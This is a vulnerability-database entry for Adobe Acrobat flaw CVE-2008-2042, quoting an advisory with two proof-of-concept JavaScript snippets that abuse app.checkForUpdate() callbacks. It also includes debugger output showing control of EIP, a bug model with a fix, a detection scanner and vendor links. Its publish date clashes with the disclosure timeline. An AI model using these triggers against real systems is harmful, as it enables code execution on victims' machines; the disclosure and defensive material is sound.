Adobe Acrobat and Reader Multiple Security Vulnerabilities

Vulnerability ID: 1187748    Vulnerability type: Input validation
Published: 2008-02-06    Updated: 2009-01-29
CVE ID: CVE-2008-2042    CNNVD ID: CNNVD-200805-062
Platform: N/A    CVSS score: 9.3
|Source
https://cxsecurity.com/issue/WLB-2008050050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-062
|Vulnerability details
Adobe Acrobat and Adobe Reader are widely used PDF readers. Multiple vulnerabilities in Adobe Reader/Acrobat could allow an attacker to cause a denial of service or fully compromise a user's system:
1) Multiple stack-based buffer overflows in several JavaScript methods allow arbitrary code execution via a specially crafted PDF file. This issue is being actively exploited in the wild.
2) An insecure JavaScript method in EScript.api allows arbitrary code execution via a specially crafted PDF file.
3) A flaw in how the SecurityProvider library is loaded allows arbitrary code execution if a user is tricked into opening a PDF file from a directory that contains a malicious library with the same name as the SecurityProvider library.
4) An insecure JavaScript method in Doc.print() allows a specially crafted PDF file to be printed without the user's knowledge.
5) An integer overflow in the printSepsWithParams() JavaScript method may lead to memory corruption.
The identifier this entry tracks, CVE-2008-2042, is the EScript.api JavaScript issue (item 2); the advisory reproduced below describes it in detail.
|Exploit (EXP)
Adobe Acrobat Professional Javascript For PDF Security Feature Bypass
and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net

Summary:

Two critical vulnerabilities exist in the JavaScript API of Adobe
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
code on the affected system.

Affected Software Versions:

Adobe Acrobat Professional 7.0.9

Details:

Both vulnerabilities lie in an undocumented function,
"app.checkForUpdate()", and are triggered through the callback
function it accepts.

The following PoC shows how restricted functions can be executed:

function myCallBack()
{
    // app.newDoc() is refused when called directly from document-level
    // JavaScript; inside this callback it succeeds.
    app.alert("It will call app.newDoc()");
    app.newDoc();
    app.alert("function has been called");
}

// Hand the callback to the undocumented app.checkForUpdate(). The other
// parameter values are arbitrary placeholders; the callback is passed as
// both oCallback and oParams exactly as in the original PoC.
app.checkForUpdate
({
    cType:"AAAA",
    cName:"BBBB",
    oCallback:myCallBack,
    cVer:"CCCC",
    cMsg:"DDDD",
    oParams:myCallBack
});

As we know, when "app.newDoc()" is called normally from a document
script, Acrobat's JavaScript security model refuses to execute it; the
code above nevertheless executes it successfully, and other restricted
functions can be executed the same way by exploiting this
vulnerability.
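
The advisory attributes the bypass to the callback being run from inside the update routine. The usual shape of that bug class is a privileged routine that invokes caller-supplied code before dropping its own privilege. The model below is an added illustration, not code from the advisory or from Adobe (Acrobat's real implementation is not public); currentContext, privilegedNewDoc and the two deputy functions are hypothetical names standing in for the real privilege check, shown in a vulnerable form and a corrected one.

```javascript
// Added model, not Acrobat's code: every name here is hypothetical and only
// reconstructs the bug class (privileged deputy runs untrusted callback).

// Privilege of the script currently executing. Document-level JavaScript
// runs as "document"; application-internal routines run as "app".
let currentContext = "document";

// A privileged API in the style of app.newDoc(): refuses any caller that
// is not running in the application context.
function privilegedNewDoc() {
  if (currentContext !== "app") {
    throw new Error("NotAllowedError: privileged method called from document context");
  }
  return "new document created";
}

// Vulnerable deputy: elevates to do its own work, then invokes the
// caller-supplied callback while still elevated, so whatever the callback
// does runs with application privileges.
function checkForUpdateVulnerable(params) {
  const saved = currentContext;
  currentContext = "app";
  try {
    // ... the routine's own privileged work would happen here ...
    return params.oCallback();          // BUG: untrusted code runs elevated
  } finally {
    currentContext = saved;
  }
}

// Hardened deputy: drops back to the caller's context before running any
// caller-supplied code, so the callback is subject to the normal checks.
function checkForUpdateHardened(params) {
  const saved = currentContext;
  currentContext = "app";
  try {
    // ... privileged work ...
  } finally {
    currentContext = saved;             // de-elevate first
  }
  return params.oCallback();            // runs as "document"
}

// Run f as a document-level script and report the outcome instead of throwing.
function attempt(f) {
  try {
    return f();
  } catch (e) {
    return "blocked: " + e.message;
  }
}

// The three calls a document-level script can make: the privileged method
// directly, and the same method wrapped in a callback handed to each deputy.
function demo() {
  const payload = { cType: "AAAA", oCallback: () => privilegedNewDoc() };
  return {
    direct: attempt(() => privilegedNewDoc()),
    viaVulnerable: attempt(() => checkForUpdateVulnerable(payload)),
    viaHardened: attempt(() => checkForUpdateHardened(payload)),
  };
}

console.log(demo());
```

The fix is not to validate the callback's contents (the callback is arbitrary script) but to make sure nothing the caller controls executes while the routine is elevated; the hardened version restores the caller's context before the callback runs, and the same rule applies to any event handler or continuation a privileged routine fires.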

The PoC for triggering the memory corruption vulnerability:

function myCallBack()
{
    app.alert("Corrupting the memory");

    // Creating a new Report from inside the callback corrupts memory
    var rep = new Report();

    app.alert("If the application has not been crashed, try to close the application and then you will get it.");
}

// Same invocation as the first PoC: only the callback body differs.
app.checkForUpdate
({
    cType:"AAAA",
    cName:"BBBB",
    oCallback:myCallBack,
    cVer:"CCCC",
    cMsg:"DDDD",
    oParams:myCallBack
});

When "new Report()" (other functions may be useful too) is called
inside the callback function, memory is corrupted. Debug output from
WinDbg follows:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
exlang32+0x101010:
10101010 001b            add     byte ptr [ebx],bl          ds:0023:00000040=??
0:000> u eip
exlang32+0x101010:
10101010 001b            add     byte ptr [ebx],bl
10101012 6c              ins     byte ptr es:[edi],dx
10101013 0000            add     byte ptr [eax],al
10101015 1b640000        sbb     esp,dword ptr [eax+eax]
10101019 336000          xor     esp,dword ptr [eax]
1010101c 0033            add     byte ptr [ebx],dh
1010101e 60              pushad
1010101f 0000            add     byte ptr [eax],al

Execution has been redirected to an unexpected address (eip = 0x10101010), where the bytes disassemble to garbage.

Using JavaScript heap spraying inside the PDF, a working exploit for
this vulnerability can be developed easily.

Note that because this particular API does NOT exist in Adobe
Reader/Acrobat 8, according to my testing the vulnerability does NOT
affect Adobe Reader/Acrobat 8.
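
Because both PoCs depend on specific JavaScript names reaching the document's scripts, a defender can triage suspect files by pulling out their JavaScript and checking for app.checkForUpdate wired to a callback that reaches app.newDoc or new Report. The scanner below is an added example, not part of the advisory or of any Adobe tool. It assumes the script is stored inline as a plain /JS or /JavaScript string (literal or hex); the sample PDFs it runs on are constructed here, and the flagged-method list is just the two methods the advisory names.

```javascript
// Added triage helper (not from the advisory or from Adobe): extracts document
// JavaScript from raw PDF bytes and flags the app.checkForUpdate + callback +
// privileged-method pattern this page describes. It reads /JS and /JavaScript
// keys holding literal "(...)" or hex "<...>" strings and resolves #xx name
// escapes (/J#53 -> /JS); it does not follow indirect references or inflate
// FlateDecode'd streams, so those must be decoded by a real PDF parser first.

// Privileged methods the advisory names; extend this list for other targets.
const PRIVILEGED_CALLS = [
  { name: "app.newDoc", re: /app\.newDoc\s*\(/ },
  { name: "new Report", re: /new\s+Report\s*\(/ },
];

// Resolve #xx escapes inside PDF names so obfuscated keys are recognised.
function decodeNames(s) {
  return s.replace(/\/((?:[A-Za-z0-9]|#[0-9A-Fa-f]{2})+)/g, (_, name) =>
    "/" + name.replace(/#([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
}

// Read a PDF literal string whose opening "(" is at index i. Handles nested
// parentheses and the common backslash escapes (octal escapes are left as-is).
const ESCAPES = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", "(": "(", ")": ")", "\\": "\\" };
function readLiteral(s, i) {
  let depth = 0;
  let out = "";
  for (; i < s.length; i++) {
    const c = s[i];
    if (c === "\\") {
      const n = s[i + 1] || "";
      out += Object.prototype.hasOwnProperty.call(ESCAPES, n) ? ESCAPES[n] : n;
      i++;
      continue;
    }
    if (c === "(") { depth++; if (depth === 1) continue; }
    if (c === ")") { depth--; if (depth === 0) return { text: out, end: i + 1 }; }
    out += c;
  }
  return { text: out, end: s.length }; // unterminated string: keep what was read
}

// Read a PDF hex string whose opening "<" is at index i.
function readHex(s, i) {
  const close = s.indexOf(">", i);
  const stop = close < 0 ? s.length : close;
  const hex = s.slice(i + 1, stop).replace(/\s+/g, "");
  let out = "";
  for (let k = 0; k < hex.length; k += 2) {
    out += String.fromCharCode(parseInt(hex.slice(k, k + 2).padEnd(2, "0"), 16));
  }
  return { text: out, end: close < 0 ? s.length : close + 1 };
}

// Collect every inline script value of a /JS or /JavaScript key.
function extractJs(pdf) {
  const src = decodeNames(pdf);
  const scripts = [];
  const re = /\/(?:JS|JavaScript)\s*(?=\(|<(?!<))/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const at = m.index + m[0].length;
    const r = src[at] === "(" ? readLiteral(src, at) : readHex(src, at);
    scripts.push(r.text);
    re.lastIndex = r.end;
  }
  return scripts;
}

// Findings for one script: the update call, a supplied callback, and any
// privileged method it could reach.
function analyzeScript(js) {
  const findings = [];
  if (/app\.checkForUpdate\s*\(/.test(js)) findings.push("app.checkForUpdate call");
  if (/\boCallback\s*:/.test(js)) findings.push("oCallback parameter supplied");
  for (const p of PRIVILEGED_CALLS) if (p.re.test(js)) findings.push("privileged method: " + p.name);
  return findings;
}

// A file is suspicious when the update call and a privileged method co-occur.
function scanPdf(pdf) {
  const scripts = extractJs(pdf);
  const findings = scripts.flatMap(analyzeScript);
  const suspicious = findings.includes("app.checkForUpdate call") &&
    findings.some((f) => f.startsWith("privileged method: "));
  return { scripts, findings, suspicious };
}

// Constructed sample: a minimal PDF whose OpenAction carries the first PoC.
const SAMPLE_PDF = [
  "%PDF-1.4",
  "1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj",
  "2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj",
  "3 0 obj << /S /JavaScript /JS (function myCallBack() { app.newDoc(); }",
  'app.checkForUpdate({cType:"AAAA", oCallback:myCallBack, oParams:myCallBack});) >> endobj',
  "trailer << /Root 1 0 R >>",
  "%%EOF",
].join("\n");

console.log(scanPdf(SAMPLE_PDF));
```

Run it with node on a file read as latin1 (`fs.readFileSync(path, "latin1")`) so bytes map one-to-one to characters. A real sample will usually keep its script in a FlateDecode'd stream or behind an indirect reference, so feed scanPdf() the decoded object bodies from a PDF parser rather than the raw file when the quick pass finds nothing.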

Solution:

Adobe has released an advisory for this vulnerability which is available on:

http://www.adobe.com/support/security/bulletins/apsb08-13.html

Fortinet advisory can be found at:

http://www.fortiguardcenter.com

CVE Information:

CVE-2008-2042

Disclosure Timeline:

2007.11.01        Vendor notified via email
2007.11.02        Vendor responded
2008.05.06        Coordinated public disclosure

--EOF--
|References

Source: XF
Name: adobe-appcheckforupdate-code-execution(42237)
Link: http://xforce.iss.net/xforce/xfdb/42237
Source: BUGTRAQ
Name: 20080507 Adobe Acrobat Professional Javascript For PDF Security Feature Bypass and Memory Corruption Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/491735/100/0/threaded
Source: VUPEN
Name: ADV-2008-1966
Link: http://www.frsirt.com/english/advisories/2008/1966/references
Source: www.adobe.com
Link: http://www.adobe.com/support/security/bulletins/apsb08-13.html
Source: SUNALERT
Name: 239286
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-239286-1
Source: SECTRACK
Name: 1019971
Link: http://securitytracker.com/id?1019971
Source: SREASON
Name: 3861
Link: http://securityreason.com/securityalert/3861
Source: SECUNIA
Name: 30840
Link: http://secunia.com/advisories/30840